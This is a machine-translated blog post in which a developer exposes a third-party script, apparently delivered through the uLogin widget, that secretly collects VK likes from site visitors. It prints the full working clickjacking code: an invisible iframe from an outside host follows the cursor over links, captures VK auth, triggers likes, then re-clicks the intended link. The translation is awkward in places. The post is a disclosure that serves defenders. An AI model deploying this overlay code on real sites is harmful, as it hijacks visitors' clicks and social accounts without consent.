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uLogin, as a means of cheating customers likes

It will be a little messy, but still in the case.
The story will be about the red square of Malevich, about uLogin and about the social activity service for a set of likes.

It all started with the fact that, picking on one of his projects, I came across a red square of Malevich - the code name for the social network likes to look like, it looked like this:

Realizing that the case is wrong, because I did not set such scripts, it was useful to look for a scandal.
For a start, I came across a certain script lying at the address:
w.uptolike.com/widgets/v1/extra.js?rnd=903182 (the Uptolike Script)
Of course, having complained to our SEO-specialist, I climbed into the admin panel and into the site code with a search for when and who managed to prescribe this script. As you suppose, I found nothing. Further - easier. We need to find someone who gives us this script. It didn’t take long to search - this is a favorite of many uLogin:

Now let's go into those features.
The Uptolike script doesn't always impersonate itself. Here is a healthy script that proved to be right when you try to repeat the wrapping experiment:
Healthy script
(function() { (function () { if (!window["__utl_adbl_initialized"]) { window["__utl_adbl_initialized"] = true; } else { return; } var body = document.getElementsByTagName("body")[0]; var img = document.createElement("img"); img.src = "//w.uptolike.com/widgets/v1/det_dbl?rnd="+Math.random()+"&ad_number=1"; img.style.position = "absolute"; img.style.top = "-100px"; img.style.left = "-100px"; img.style.width = "1px"; img.style.height = "1px"; setTimeout(function() {body.removeChild(img);}, 2000); body.appendChild(img); })();})(); 

Here is a script from a smoker who accidentally caught my eye from Uptolike:
Smoker script
 (function() { (function () { if (!window["__utl_adbl_initialized"]) { window["__utl_adbl_initialized"] = true; } else { return; } var body = document.getElementsByTagName("body")[0]; var img = document.createElement("img"); img.src = "//w.uptolike.com/widgets/v1/det_dbl?rnd="+Math.random()+"&ad_number=1"; img.style.position = "absolute"; img.style.top = "-100px"; img.style.left = "-100px"; img.style.width = "1px"; img.style.height = "1px"; setTimeout(function() {body.removeChild(img);}, 2000); body.appendChild(img); })();(function() { function addScript(url) { var el = document.createElement("script"); el.type = "text/javascript"; el.charset = 'utf-8'; el.async = 'true'; el.src = url; el.isLoaded = false; document.getElementsByTagName('head')[0].appendChild(el); } if (window.location.protocol=='https') { return; } if (!window["__utl_clkj_initialized"]) { window["__utl_clkj_initialized"] = true; } else { return; } function install() { var cleaning = false; var lastClickedElement; var body = document.getElementsByTagName("body")[0]; var div = document.createElement("div"); div.style.position = "absolute"; div.style.width = "1px"; div.style.height = "1px"; div.style.top = "-1px"; div.style.left = "-1px"; div.style.zIndex = "10000"; div.innerHTML = "<div id='__smth_wrap1' style='overflow: hidden;width: 20px;height: 25px;opacity:0.000001; position: fixed; z-index: 100001;'><iframe width='100' height='100' style='width:100px; height:100px;' src='http://in.sovinspector.ru/index.php?page=f5253166-a338-425d-b1ed-76dfd3862dc8'></iframe></div>"; body.appendChild(div); var el = document.getElementById("__smth_wrap1"); var mousemove = function(e) { var x = e.clientX, y = e.clientY; div.style.zIndex = "-1"; var element = document.elementFromPoint(x, y); div.style.zIndex = "10000"; if (element.nodeName == "A" || element.parentNode.nodeName == "A") { div.style.display = "block"; el.style.left = (e.pageX - 10) + "px"; el.style.top = (e.pageY - window.scrollY - 12) + "px"; lastClickedElement = element; } else { lastClickedElement = undefined; div.style.display = "none"; } }; var clickListener = function(e) { setTimeout(function() { cleanup(); }, 100); }; document.addEventListener("mouseup", clickListener); function init(msg) { if (cleaning) { return; } if (msg && msg.data["context"]==="stggr") { if (msg.data["action"] === "init") { if (cleaning) { return; } setTimeout(function() { if (cleaning) { return; } div.style.width = "100%"; div.style.height = "100%"; div.style.top = "0"; div.style.left = "0"; window.addEventListener("mousemove", mousemove); }, 1000); } else if (msg.data["action"] === "clean") { cleanup(); } else if (msg.data["action"] === "got") { var img = document.createElement("img"); img.src = "//w.uptolike.com/widgets/v1/vk_clk?rnd="+Math.random(); img.style.position = "absolute"; img.style.top = "-100px"; img.style.left = "-100px"; img.style.width = "1px"; img.style.height = "1px"; img.onLoad = function() { clickOnce(); } setTimeout(function() {body.removeChild(img);}, 2000); body.appendChild(img); var clicked = false; var clickOnce = function() { if (clicked) return; if (lastClickedElement) { lastClickedElement.click(); clicked = true; } } setTimeout(clickOnce, 500); cleanup(); } } } if (window.addEventListener){ window.addEventListener("message", init, false); } else { window.attachEvent("onmessage", init); } var cleanup = function () { cleaning = true; window.removeEventListener("mousemove", mousemove); document.removeEventListener("mouseup", clickListener); document.removeEventListener("message", init) body.removeChild(div); }; } install(); })()})(); 

What is he doing:

Iframe content
 <html> <head> <script src="//vk.com/js/api/openapi.js?115"></script> <script> var debug = false; function log(e) { if (debug && window["console"]) { console.log(e); } } function initialize() { var body = document.getElementsByTagName("body")[0]; VK.init({apiId: '4536751' }); VK.Widgets.Auth("_smth__vk_auth", {width: "200px", onAuth: function (data) { log("User authenticated: "+data); window.parent.postMessage({context: "stggr", action: "got", data: data}, "*"); }, onReady: function () { log("VK widget ready"); window.parent.postMessage({context: "stggr", action: "init"}, "*"); }}); setTimeout(function() { var wrapper = document.getElementById("wrapper"); var h = wrapper.clientHeight; if (h<90) { log("Unauthorized (iframe height: "+h+"px)"); document.body.removeChild(wrapper) window.parent.postMessage({context: "stggr", action: "clean"}, "*"); } else { log("Authorized"); wrapper.removeChild(document.getElementById("_smth__vk_auth")); VK.Observer.subscribe("widgets.like.liked", function() { log("like clicked"); window.parent.postMessage({context: "stggr", action: "got"}, "*"); }); VK.Observer.subscribe("widgets.like.unliked", function() { log("unlike clicked"); window.parent.postMessage({context: "stggr", action: "got"}, "*"); }); VK.Widgets.Like("_smth_vk_like", {type: "button"}); var rm = setInterval(function() { if (document.querySelector) { var iframe = document.querySelector("body > iframe"); if (iframe) { document.body.removeChild(iframe); log("cleared iframe"); clearInterval(rm); } } }, 50); // wrapper.style.top = "-75px"; wrapper.style.left = "-25px"; } }, 2000); } </script> <style> #wrapper { position:absolute; top:0; left:-210px; /*top:-75px;*/ /*left:-15px; */ width: 100px; } </style> </head> <body onload="initialize();"> <div id="wrapper"> <div id="_smth__vk_auth"></div> <div id="_smth_vk_like"></div> </div> </body> </html> 

Links to resources can be taken from the code. And yes, this is an example of how modern “features” are used in modern “CEO”.

Source: https://habr.com/ru/post/238117/

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